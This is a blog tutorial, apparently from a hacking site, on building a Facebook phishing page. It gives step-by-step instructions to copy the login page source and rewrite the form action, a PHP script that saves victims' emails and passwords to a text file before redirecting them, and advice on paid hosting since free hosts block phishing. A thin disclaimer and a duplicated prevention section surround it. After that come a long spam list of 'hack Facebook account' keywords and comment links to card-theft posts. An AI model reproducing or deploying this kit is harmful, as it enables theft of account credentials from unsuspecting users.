WHAT IS PHISHING? HOW TO CREATE PHISHING PAGE FACEBOOK EXAMPLE

  First of all, I want to tell you one thing. This article is written only for educating people about how phishing works and how should they prevent phishing scams. Please don’t use these techniques for malicious purposes.  

What is Phishing?

Phishing is a most popular technique used for hacking passwords and stealing sensitive information like credit cards, Banking username & passwords etc. Phishing aka fishing attack is a process of creating a duplicate copy or a clone of a reputed website in the intention of stealing user’s password or other sensitive information like credit card details. It is easy for anyone who is having little technical knowledge to get a phishing page done and that is why this method is so popular.

Phishing scams prompts users to enter sensitive details at a fake webpage (phishing page) whose look and feel are very identical to legitmate webpages. In most cases, the only difference is URL. URL can also be spoofed in some cases if the legitmate website is vulnerable.

It is difficult for a commoner to identify the phishing scams page because of its trustworthy layout.

How phishing works?

Hackers / Attackers target general public and send them phishing links through email or personal message where the victim is prompted to click on a link in the email. The user / victim will get navigated to a Phishing page that pretends to be legit. Common people who don’t find that phishing page suspicious are induced to enter their sensitive information and all the information would get sent to the hacker / attacker.

Phishing Example 

Lets take Facebook as an example, Creating a page which perfectly looks like Facebook login page but putting it in a different URL like fakebook.com or faecbook.com or any URL which pretends to be legit. When a user lands on such page, he/she might think that is real Facebook login page and asking them to provide their username and password. So the people who don’t find the fake login page suspicious might enter their username, password and the password information would be sent to the hacker/attacker who created it, simultaneously the victim would get redirected to original Facebook page.

Real Life Example : John is a programmer, he creates a Facebook login page with some scripts to enable him to get the username and password information and put it in https://www.facebouk.com/make-money-online-tricks. Peter is a friend of John. John sends a message to Peter “Hey Peter, I found a way to make money online easily you should definitely take a look at this https://www.facebouk.com/make-money-online-tricks”.

Peter navigate to the link and see a Facebook login page. As usual Peter enters his username and password of Facebook. Now the username and password of Peter is sent to John and Peter get redirected to a money making tips page https://www.facebouk.com/make-money-online-tricks-tips.html. That’s all Peter’s Facebook account is hacked.

We are going to take Facebook phishing page as an example.

  • Go to Facebook.com, make sure you are not logged in to Facebook.
  • Press Ctrl + U to view source code.
  • Copy the source code and paste it in a notepad.
  • Find the action attribute of the login form in the code. Search for keyword “action” without quotes by pressing Ctrl + F in notepad. In Facebook login page, action attribute was filled with Facebook login process url, replace it with process.php
  • You have to find name of input fields using inspect element (Ctrl + Shft + I in Chrome), in our case it is email and pass
  • Save this file as index.html
  • Now you have to get username and password stored in a text file named phishing.txt
  • Create a file named process.php using the following code.
facebook phishing site

Process.php<?
if(isset($_POST[’email’]) && isset($_POST[‘pass’]))
{
$password=file_get_contents(‘phishing.txt’);
$phishing = fopen(“phishing.txt”,”w”);
fwrite($phishing,$password.”Email : “.$_POST[’email’].” , Password”.$_POST[‘pass’].”\n”);
fclose($file);
echo ‘<script>window.location.href=”https://wwww.facebook.com/”</script>’;
}
else
echo ‘<script>window.location.href=”index.html”</script>’;
?>

How to host phishing page in a URL?

To put phishing page in a URL, you need to have two things.

  1. Domain
  1. Web Hosting

Get a Free Domain

You can create a free domain at Bluehost if you pay for their hosting plans. Once you create a domain, you need to get hosting and setup name servers for it. If you select bluehost you don’t need to setup name servers since it will already be set.

Get Web Hosting

Almost all free hosting panels would block phishing pages. So you need to get any paid shared hosting package, it would cost around $4 USD per month. I prefer bluehost for their excellent service and performance. Get bluehost shared hosting and free domain now. Once you setup domain and hosting, you can upload the files using FTP software. That’s all you can test it now.

How could you protect yourself from phishing scams?

Hackers can reach you in many ways like email, personal messages, Facebook messages, Website ads etc. Clicking any links from these messages would lead you to a login page. Whenever you find a email that navigates you to a webpage, you should note only one thing which is URL because nobody can spoof URL except when there is any XSS zero day vulnerability.

How could you protect yourself from phishing scams?

Hackers can reach you in many ways like email, personal messages, Facebook messages, Website ads etc. Clicking any links from these messages would lead you to a login page. Whenever you find a email that navigates you to a webpage, you should note only one thing which is URL because nobody can spoof URL except when there is any XSS zero day vulnerability.

What is the URL you see in browser address bar? Is that really https://www.LEGITWEBSITE.com? Is there any Green colour secure symbol (HTTPS) provided in the address bar? You can prevent hacking by remembering these questions.  Also see the below examples of Facebook phishing pages. Perfect Phishing Pages

Most of the people won’t suspect this page (snapshot given above) since there is https prefix with green colour secure icon and no mistake in www.facebook.com. But this is a phishing page how? Note the URL correctly. It is https://www.facebook.com.infoknown.com so www.facebook.com is a subdomain of infoknown.com. Google Chrome don’t differentiate the sub-domain and domain unlike Firefox do. SSL Certificates (HTTPS) can be obtained from many vendors, few vendors give SSL Certificate for Free for 1 year. Its not a big deal for a novice to create a perfect phishing page like this. So be aware of it.

Facebook Phishing Page – Note the misleading URL. This is a normal Facebook Phishing page with some modification in the word Facebook.

Phishing scams

Phishing scams are attempts by scammers / hackers / cybercriminals to trick you to enter your sensitive infomation like internet banking username & passwords, credit card details etc. As described above, phishing scams focuses on retrieving monetary details indirectly.

Phishing email

Most of the time phishing scams happens through email. Hackers spoof the email address of any legitimate website or authority to send phishing scam email, so the users are convinced to believe that the email is sent from a legit website. Email address can be easily spoofed using email headers. Server scripting languages like php helps a commoner to spoof from email address easily. Popuplar email services like gmail are smart enough to identify phishing email and route it to spam folder. But still there are some ways for a hacker to send phishing emails.


Top ways to hack a facebook account, How to protect your facebook ID from hacker?


How To Hack Facebook Account Password

facebook account hacked recovery
facebook account hacked email changed
facebook account hacked and password changed
facebook account hacked phone number
facebook account hacked sending messages
facebook account hacked and locked
facebook account hacked locked out
facebook account hacked and can’t access email
facebook account hacked news
facebook account hacked repeatedly
facebook account hacked apology
facebook account hacked can’t log in
facebook account hacked reddit
facebook account hacked friends deleted
facebook account hacked and name changed
facebook account hacked video
facebook account hacked today
facebook account hacked and blocked
facebook account hacked helpline
facebook account hacked and email changed
facebook account hacked and password changed 2018
facebook account hacked ads
facebook account hacked and language changed
facebook account hacked asking for money
facebook account hacked and can’t log in
facebook account hacked and deleted
facebook account hacked arabic
facebook account hacked and duplicated
facebook account hacked and phone number changed
facebook account hacked and deactivated
facebook account hacked and email and password changed
facebook account hacked and trusted contacts changed
facebook account hacked and taken over
facebook account hacked by isis
facebook account hacked by ex
facebook account hacked by arab
facebook account hacked by russian
facebook account hack bangla
facebook account hack by username
facebook account hack by html
fb account hack by phishing
facebook account hacked changed password
facebook account hacked cant access
facebook account hacked can’t access email
facebook account hacked can’t gain access
facebook account hacked can’t reset password
facebook account hacked contact number
facebook account hack crime
facebook account hack cmd
facebook.com hacker cup
facebook hacked email changed
facebook hack from catfish
facebook hack with cookies
facebook hacking with code
facebook hack using chrome
facebook account hacked deleted
facebook account hacked disabled
facebook account hacked deactivated
facebook com hacked disavow
facebook hacked and deactivated
facebook hacked and disabled
facebook hacked in different language
facebook account hacked how do i get it back
facebook page hacked and deleted
facebook account hacked password changed download
facebook messenger hacked what do i do
facebook account hacked email and password
facebook account hack.exe
facebook_account_hacker.exe
facebook account ethical hacking
fb id hack easy way bangla
facebook messenger everwing hack
facebook account hack inspect element
facebook account hacked friend request
facebook account hacked from china
facebook hack for friend request
fb hacker by facesgeek
facebook account hacker guide
facebook messenger getting hacked
my facebook account hacked get back
facebook messenger games hack
facebook page growth hack
facebook hack for good
facebook hack with gmail
facebook hack using google chrome
facebook and google hack
fb messenger games hack
facebook account keeps getting hacked
can facebook account get hacked
how does facebook account get hacked
if your facebook account gets hacked
facebook account hacked how to recover
facebook account hacked how
facebook account hacked how to delete it
facebook account hacked how to contact facebook
fb hack by hayy
facebook account hacked in arabic
facebook account hacked ip address
if facebook account is hacked
my facebook account is hacked how to get back
my facebook account is hacked how to deactivate it
my facebook account is hacked quotes
my facebook account is hacked status
friends facebook account is hacked
if your facebook account is hacked
facebook account hack javascript
facebook account hacker java
facebook account hacker.jar
facebook id hack java app
fb id hack.jar
fb id hack java
facebook hacker for java
facebook account hack ho jaye to kya kare
facebook hacker in jalandhar
facebook hack for java
facebook hacker in jaipur
facebook hacker for java download
fb hacker for java
fb account hack ho jaye to kya kare
facebook id hack ho jaye to kya kare
fb account hack kaise kiya jata hai
fb id hacker app java
facebook account hack karne ka tarika
facebook account hack karna
facebook account hack kare
facebook account hack karna hai
facebook account hack kaise kare hindi
fb account hack korbo kivabe
facebook id hack karne ka tarika
facebook messenger hack kaise kare
facebook id hack karne ka app
facebook id hack kare
facebook account hacked login email changed
facebook account hacked language changed
facebook account hacked list
facebook account hacked login
facebook page hack likes
facebook account hacked can’t login
facebook hacked and language changed
facebook messenger location hack
facebook page likes hack online
facebook account hacked messenger
facebook account hacked multiple times
facebook messenger hacked messages
facebook account hacked posting messages
facebook account hacked you must take immediate steps
facebook hacked by muslim
facebook account hacked sending messages 2018
my facebook account hacked how to recover
facebook account hacked no access
facebook account hacked no email
facebook account hacked no access to email
facebook account hacked name changed
facebook id hack number
facebook.com hacker news
fb messenger hack news
facebook hacked and name changed to arabic
facebook account hacked phone number changed
free facebook account hack no download
facebook hack with no survey
facebook hack using notepad
facebook hacker with number
facebook account hacked password changed
facebook account hacked password and email changed
facebook account hacker pro ( v16.7.2)
facebook account hacker philippines
facebook account hack pdf
facebook account hack phishing
fb account hack possible
facebook account password hacker v5.6
facebook email hack password
facebook account hacking course pdf
facebook account hacked quotes
facebook account hacked security question change
my facebook account has been hacked quotes
facebook account hacked ray ban
facebook account hacked recovery email changed
facebook account hack root
fb account hack report
facebook page hacked report
facebook page hacked recovery
facebook account hacked status
facebook account hacked solution
facebook account hacked sending friend requests
facebook account hacked sending messages friends
facebook account hacked statistics
facebook account hacked sending spam
facebook account hacked spam
facebook account hacked site
facebook account hacked steps
facebook messenger hacked signs
facebook hacked by someone
facebook hacked by syria
facebook account hacked by spammers
facebook account hacked how to
facebook messenger hacked how to fix
facebook messenger hacked what to do
facebook page hacked how to get it back
facebook account hacked and changed to arabic
facebook account hack ultimate edition
facebook account hack ubuntu
facebook account hack urdu
facebook hacker using username
facebook hacker with username
facebook hack using username
facebook messenger uno hack
facebook hack using ubuntu
facebook hacking with ubuntu
fb hack by username
facebook account hacked via messenger
facebook account hacker v3
facebook account hacker v.4.0.5
facebook account hacker v2.4
facebook account hack v 4.0 free download
facebook account hack v1 3 free download
facebook account hacker v6.2 free download
fb account hacker v2.3
fb account hack video download
facebook.com hacker v1.8
facebook hack account v2 8 2012 free download
fb messenger hack video
facebook id verification hack
facebook account hacked why
facebook account hacked where to report
facebook account hack wikihow
facebook email hacker way
xyloor facebook account hacked
email+facebook account hacked by xl3gi0n
facebook account hack youtube
fb account hack youtube
facebook messenger hacked youtube
facebook id hack youtube
facebook messenger hack its you
facebook_account_hacker .zip.html
facebook account hacker zip password
fb id hack z shadow
facebook account hack v1.2.zip
facebook hacked account recovery 2017
facebook account recovery after hacking
facebook account hacked and recovery email changed
can’t recover hacked facebook account
facebook hacked and can’t reset password
facebook account recovery code hack
facebook hack recover deleted messages

Post Author: kalilinuxexpert

5 thoughts on “WHAT IS PHISHING? HOW TO CREATE PHISHING PAGE FACEBOOK EXAMPLE

    seo uzmanı

    (June 25, 2018 - 8:02 am)

    Having read this I believed it was really informative. I appreciate you taking the time and effort to put this informative article together.
    I once again find myself personally spending a lot of time both reading and commenting.
    But so what, it was still worthwhile!

    […] Hack Credit Card Number With CVV Hack Any Bank Account Information Hack Facebook Account Profile Within 5 Minutes Hack Any Password Protected WiFi Network | WiFi Hacking With Linux How To hack windows login Password What Is Phishing? How To Create Facebook Phishing Page […]

    […] Hack Credit Card Number With CVV Hack Any Bank Account Information Hack Facebook Account Profile Within 5 Minutes Hack Any Password Protected WiFi Network | WiFi Hacking With Linux How To hack windows login Password What Is Phishing? How To Create Facebook Phishing Page […]

    […] Any Password Protected WiFi Network | WiFi Hacking With Linux How To hack windows login Password What Is Phishing? How To Create Facebook Phishing Page Tags: How To Hack Facebook Account Password Without Downloading Anything. How To Hack […]

    Hack Any Bank Account Information

    (September 6, 2018 - 12:11 am)

    […] What Is Phishing? How To Create Facebook Phishing Page […]

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.